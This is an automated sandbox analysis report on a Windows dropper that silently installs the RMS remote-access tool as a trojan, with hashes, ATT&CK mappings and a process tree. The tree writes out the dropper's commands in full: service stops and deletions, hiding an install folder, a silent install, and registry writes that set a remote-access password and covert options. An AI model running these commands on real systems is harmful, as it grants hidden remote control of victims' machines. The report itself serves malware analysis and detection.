rms | 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e

Analysis

max time kernel
149s
max time network
194s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
27-11-2022 15:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
Size

3.3MB
MD5

6627f3503fd971c24f274d670b9d6cd7
SHA1

b77b984497b6c3d1d695de6363b1b35d9a4c192e
SHA256

408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e
SHA512

cf9210fa61eb5fec5d8d3bf2ea7e22c1f2d5f54c5f80b71c4146f73a4369a3ea0e5b7489750ff6ec00fee347398d023fb8580c1a4e134932cbd3ff555b9f380a
SSDEEP

98304:VgwRLgSX5ZcttvsdEv9eL4UezmlplRUSJLWpAh:VgOgSX/GW+1SezmXlRDRT

Score

10^/10

rms evasion rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Executes dropped EXE 5 IoCs

Processes:

data.exerutserv.exerutserv.exerutserv.exerutserv.exe

pid process

3852 data.exe
2860 rutserv.exe
4776 rutserv.exe
4916 rutserv.exe
4840 rutserv.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

3488 attrib.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
3852	data.exe
2860	rutserv.exe
4776	rutserv.exe
4916	rutserv.exe
4840	rutserv.exe

pid	process
3488	attrib.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe	upx
C:\Windows\spom\rfusclient.exe	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

data.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA data.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	data.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\data.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\data.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\hide.exe	autoit_exe

Drops file in Windows directory 64 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt	cmd.exe
File opened for modification	C:\Windows\spom\JavaDeployReg.log	cmd.exe
File opened for modification	C:\Windows\spom\tmpBC08.tmp	cmd.exe
File opened for modification	C:\Windows\spom\wct611B.tmp	cmd.exe
File opened for modification	C:\Windows\spom\WIJBFSKT-20221111-1347.log	cmd.exe
File created	C:\Windows\spom\WIJBFSKT-20221111-1347a.log	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI15DD.txt	cmd.exe
File created	C:\Windows\spom\hide.exe	cmd.exe
File created	C:\Windows\spom\jawshtml.html	cmd.exe
File opened for modification	C:\Windows\spom\jusched.log	cmd.exe
File opened for modification	C:\Windows\spom\nouac.cmd	cmd.exe
File created	C:\Windows\spom\WIJBFSKT-20221111-1347.log	cmd.exe
File created	C:\Windows\spom\rfusclient.exe	cmd.exe
File opened for modification	C:\Windows\spom\BroadcastMsg_1668174376.txt	cmd.exe
File opened for modification	C:\Windows\spom\hide.exe	cmd.exe
File opened for modification	C:\Windows\spom\tmpBE88.tmp	cmd.exe
File created	C:\Windows\spom\wct611B.tmp	cmd.exe
File created	C:\Windows\spom\wct66BA.tmp	cmd.exe
File created	C:\Windows\spom\wctB774.tmp	cmd.exe
File opened for modification	C:\Windows\spom\aria-debug-1468.log	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistUI1607.txt	cmd.exe
File created	C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20221111_134153107.html	cmd.exe
File created	C:\Windows\spom\uac.cmd	cmd.exe
File created	C:\Windows\spom\JavaDeployReg.log	cmd.exe
File created	C:\Windows\spom\rutserv.exe	cmd.exe
File opened for modification	C:\Windows\spom\rutserv.exe	cmd.exe
File created	C:\Windows\spom\tmpBE88.tmp	cmd.exe
File opened for modification	C:\Windows\spom\uac.cmd	cmd.exe
File created	C:\Windows\spom\data.exe	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistMSI1607.txt	cmd.exe
File created	C:\Windows\spom\jusched.log	cmd.exe
File opened for modification	C:\Windows\spom\sa.9NCBCSZSJRSB_0__.Public.InstallAgent.dat	cmd.exe
File opened for modification	C:\Windows\spom\wctB774.tmp	cmd.exe
File created	C:\Windows\spom\wmsetup.log	cmd.exe
File opened for modification	C:\Windows\spom\AdobeSFX.log	cmd.exe
File created	C:\Windows\spom\chrome_installer.log	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI15DD.txt	cmd.exe
File created	C:\Windows\spom\dd_vcredistUI1607.txt	cmd.exe
File opened for modification	C:\Windows\spom\rfusclient.exe	cmd.exe
File created	C:\Windows\spom\tmpBC08.tmp	cmd.exe
File opened for modification	C:\Windows\spom\wct66BA.tmp	cmd.exe
File opened for modification	C:\Windows\spom\chrome_installer.log	cmd.exe
File opened for modification	C:\Windows\spom\data.exe	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistMSI15DD.txt	cmd.exe
File opened for modification	C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20221111_134153107.html	cmd.exe
File created	C:\Windows\spom\sa.9NCBCSZSJRSB_0__.Public.InstallAgent.dat	cmd.exe
File created	C:\Windows\spom\wct19BD.tmp	cmd.exe
File created	C:\Windows\spom\dd_vcredistMSI1607.txt	cmd.exe
File created	C:\Windows\spom\msedge_installer.log	cmd.exe
File created	C:\Windows\spom\nouac.cmd	cmd.exe
File opened for modification	C:\Windows\spom\wct805B.tmp	cmd.exe
File opened for modification	C:\Windows\spom\dd_vcredistUI15DD.txt	cmd.exe
File created	C:\Windows\spom\wct805B.tmp	cmd.exe
File opened for modification	C:\Windows\spom\msedge_installer.log	cmd.exe
File opened for modification	C:\Windows\spom\wctC330.tmp	cmd.exe
File opened for modification	C:\Windows\spom\wmsetup.log	cmd.exe
File created	C:\Windows\spom\aria-debug-1468.log	cmd.exe
File created	C:\Windows\spom\BroadcastMsg_1668174376.txt	cmd.exe
File created	C:\Windows\spom\wctC330.tmp	cmd.exe
File opened for modification	C:\Windows\spom	attrib.exe
File created	C:\Windows\spom\AdobeSFX.log	cmd.exe
File opened for modification	C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt	cmd.exe
File opened for modification	C:\Windows\spom\wct19BD.tmp	cmd.exe
File opened for modification	C:\Windows\spom\jawshtml.html	cmd.exe

Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

3096 sc.exe
3276 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs net.exe

pid	process
3096	sc.exe
3276	sc.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

rutserv.exerutserv.exerutserv.exerutserv.exe

pid	process
2860	rutserv.exe
2860	rutserv.exe
2860	rutserv.exe
2860	rutserv.exe
2860	rutserv.exe
2860	rutserv.exe
4776	rutserv.exe
4776	rutserv.exe
4916	rutserv.exe
4916	rutserv.exe
4840	rutserv.exe
4840	rutserv.exe
4840	rutserv.exe
4840	rutserv.exe
4840	rutserv.exe
4840	rutserv.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

rutserv.exerutserv.exerutserv.exe

description	pid	process
Token: SeDebugPrivilege	2860	rutserv.exe
Token: SeDebugPrivilege	4916	rutserv.exe
Token: SeTakeOwnershipPrivilege	4840	rutserv.exe
Token: SeTcbPrivilege	4840	rutserv.exe
Token: SeTcbPrivilege	4840	rutserv.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

data.exe

pid process

3852 data.exe
3852 data.exe
3852 data.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

data.exe

pid process

3852 data.exe
3852 data.exe
3852 data.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

rutserv.exerutserv.exerutserv.exerutserv.exe

pid process

2860 rutserv.exe
4776 rutserv.exe
4916 rutserv.exe
4840 rutserv.exe

pid	process
3852	data.exe
3852	data.exe
3852	data.exe

pid	process
3852	data.exe
3852	data.exe
3852	data.exe

Suspicious use of WriteProcessMemory 63 IoCs

Processes:

408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exedata.execmd.exenet.exenet.exe

description	pid	process	target process
PID 2152 wrote to memory of 3852	2152	408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe	data.exe
PID 2152 wrote to memory of 3852	2152	408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe	data.exe
PID 2152 wrote to memory of 3852	2152	408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe	data.exe
PID 2152 wrote to memory of 3856	2152	408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe	cmd.exe
PID 2152 wrote to memory of 3856	2152	408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe	cmd.exe
PID 2152 wrote to memory of 3856	2152	408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe	cmd.exe
PID 3852 wrote to memory of 2620	3852	data.exe	cmd.exe
PID 3852 wrote to memory of 2620	3852	data.exe	cmd.exe
PID 3852 wrote to memory of 2620	3852	data.exe	cmd.exe
PID 2620 wrote to memory of 4316	2620	cmd.exe	net.exe
PID 2620 wrote to memory of 4316	2620	cmd.exe	net.exe
PID 2620 wrote to memory of 4316	2620	cmd.exe	net.exe
PID 4316 wrote to memory of 4528	4316	net.exe	net1.exe
PID 4316 wrote to memory of 4528	4316	net.exe	net1.exe
PID 4316 wrote to memory of 4528	4316	net.exe	net1.exe
PID 2620 wrote to memory of 2820	2620	cmd.exe	net.exe
PID 2620 wrote to memory of 2820	2620	cmd.exe	net.exe
PID 2620 wrote to memory of 2820	2620	cmd.exe	net.exe
PID 2820 wrote to memory of 2244	2820	net.exe	net1.exe
PID 2820 wrote to memory of 2244	2820	net.exe	net1.exe
PID 2820 wrote to memory of 2244	2820	net.exe	net1.exe
PID 2620 wrote to memory of 3096	2620	cmd.exe	sc.exe
PID 2620 wrote to memory of 3096	2620	cmd.exe	sc.exe
PID 2620 wrote to memory of 3096	2620	cmd.exe	sc.exe
PID 2620 wrote to memory of 3276	2620	cmd.exe	sc.exe
PID 2620 wrote to memory of 3276	2620	cmd.exe	sc.exe
PID 2620 wrote to memory of 3276	2620	cmd.exe	sc.exe
PID 2620 wrote to memory of 4724	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 4724	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 4724	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 3488	2620	cmd.exe	attrib.exe
PID 2620 wrote to memory of 3488	2620	cmd.exe	attrib.exe
PID 2620 wrote to memory of 3488	2620	cmd.exe	attrib.exe
PID 2620 wrote to memory of 2860	2620	cmd.exe	rutserv.exe
PID 2620 wrote to memory of 2860	2620	cmd.exe	rutserv.exe
PID 2620 wrote to memory of 2860	2620	cmd.exe	rutserv.exe
PID 2620 wrote to memory of 4776	2620	cmd.exe	rutserv.exe
PID 2620 wrote to memory of 4776	2620	cmd.exe	rutserv.exe
PID 2620 wrote to memory of 4776	2620	cmd.exe	rutserv.exe
PID 2620 wrote to memory of 3532	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 3532	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 3532	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 3224	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 3224	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 3224	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 2584	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 2584	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 2584	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 4884	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 4884	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 4884	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 3804	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 3804	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 3804	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 3728	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 3728	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 3728	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 2444	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 2444	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 2444	2620	cmd.exe	reg.exe
PID 2620 wrote to memory of 4916	2620	cmd.exe	rutserv.exe
PID 2620 wrote to memory of 4916	2620	cmd.exe	rutserv.exe
PID 2620 wrote to memory of 4916	2620	cmd.exe	rutserv.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

3488 attrib.exe

pid	process
3488	attrib.exe

C:\Users\Admin\AppData\Local\Temp\408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
"C:\Users\Admin\AppData\Local\Temp\408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2152

C:\Users\Admin\AppData\Local\Temp\data.exe
"C:\Users\Admin\AppData\Local\Temp\data.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nouac.cmd
3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2620

C:\Windows\SysWOW64\net.exe
net stop netaservice
4⤵
- Suspicious use of WriteProcessMemory
PID:4316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop netaservice
5⤵
PID:4528

C:\Windows\SysWOW64\net.exe
net stop rmanservice
4⤵
- Suspicious use of WriteProcessMemory
PID:2820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop rmanservice
5⤵
PID:2244

C:\Windows\SysWOW64\sc.exe
sc delete netaservice
4⤵
- Launches sc.exe
PID:3096

C:\Windows\SysWOW64\sc.exe
sc delete rmanservice
4⤵
- Launches sc.exe
PID:3276

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
4⤵
PID:4724

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Windows\spom"
4⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:3488

C:\Windows\spom\rutserv.exe
"rutserv.exe" /silentinstall
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2860

C:\Windows\spom\rutserv.exe
"rutserv.exe" /firewall
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4776

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003600310030003000330022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e006600720061006e006b006400650062006f006500720040006d00610069006c002e0063006f006d003c002f0065006d00610069006c003e003c00690064003e007b00450043004500370036003700360031002d0034004500420039002d0034003000380046002d0041003000410043002d003300370042003600370042004100330045004100420044007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00360031003000300033003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a00
4⤵
PID:3532

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
4⤵
PID:3224

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400
4⤵
PID:2584

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00
4⤵
PID:4884

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323030392e37343435313730303233084c6963656e73657306ae524d532d462d62366665664645334436363231346539363944333744396163653235423032366269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c46564467594841514271664738645556554f446c5246446d42346667494e4841494341514a76594878704141734c4141734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f6465536574080000
4⤵
PID:3804

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Windows\spom\rfusclient.exe"
4⤵
PID:3728

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00
4⤵
PID:2444

C:\Windows\spom\rutserv.exe
"rutserv.exe" /start
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
2⤵
PID:3856

C:\Windows\spom\rutserv.exe
C:\Windows\spom\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4840

C:\Windows\spom\rfusclient.exe
C:\Windows\spom\rfusclient.exe
2⤵
PID:4576

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd
Filesize
300B

MD5
a47e0180694389aee99b8e5593d5dced

SHA1
925927658ea434258d2e26e8a8aa49a063376076

SHA256
784e908ccad4e77d92be78cc2be0f502d29d0cf6e65331b56720cf0e5ad8b195

SHA512
5d03369ccc1056b50609698d103c4f8694842a29329dccab7fd443af790c2575fd8a1877f78b58f136a428faa6375c51a74f56ab7eded219a58e7e4aef678c41

Download Submit
C:\Users\Admin\AppData\Local\Temp\data.exe
Filesize
819KB

MD5
71a944406c89ab321cb1e55c37916d70

SHA1
be6ee2015475bdc1a665b1e6b86e86fcc1025c91

SHA256
4f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96

SHA512
9ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda

Download Submit
C:\Users\Admin\AppData\Local\Temp\data.exe
Filesize
819KB

MD5
71a944406c89ab321cb1e55c37916d70

SHA1
be6ee2015475bdc1a665b1e6b86e86fcc1025c91

SHA256
4f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96

SHA512
9ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda

Download Submit
C:\Users\Admin\AppData\Local\Temp\hide.exe
Filesize
819KB

MD5
72cc4ab6ee23c79bbeed4c4d7b31f741

SHA1
a5598acb794ebbbad6c0819c20f6f7ed99541e89

SHA256
5be7bb92afe804aa0eaac077f5527f9710c5a3ebd6a7c898d810d3d0388ecf73

SHA512
4840b26abe306cdd05694eb8f0f750e451d83cdb4787b5539d730645ce66b2915b422f9e6be4a22885929fffb3c4b5bb50d9ffa8454045a11b55277c611eabf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\nouac.cmd
Filesize
10KB

MD5
6786599aff4e8eb99164bdcbd3e7397b

SHA1
be5daca8309b33310a59d253876ae49e4f26f3d7

SHA256
ccc3c629937f5e26cf78de269feb5739cb2d859ab099312a8089afd98a1b2748

SHA512
5925c7227cacf2a26a26a79e49b4b6aeacda862ef2fff7c879e679f5ee5e0fc87bf33cb0d8b5681b570977bf9d415dbfd2ec31c6fe4a03b90af47fe3a7e8e783

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
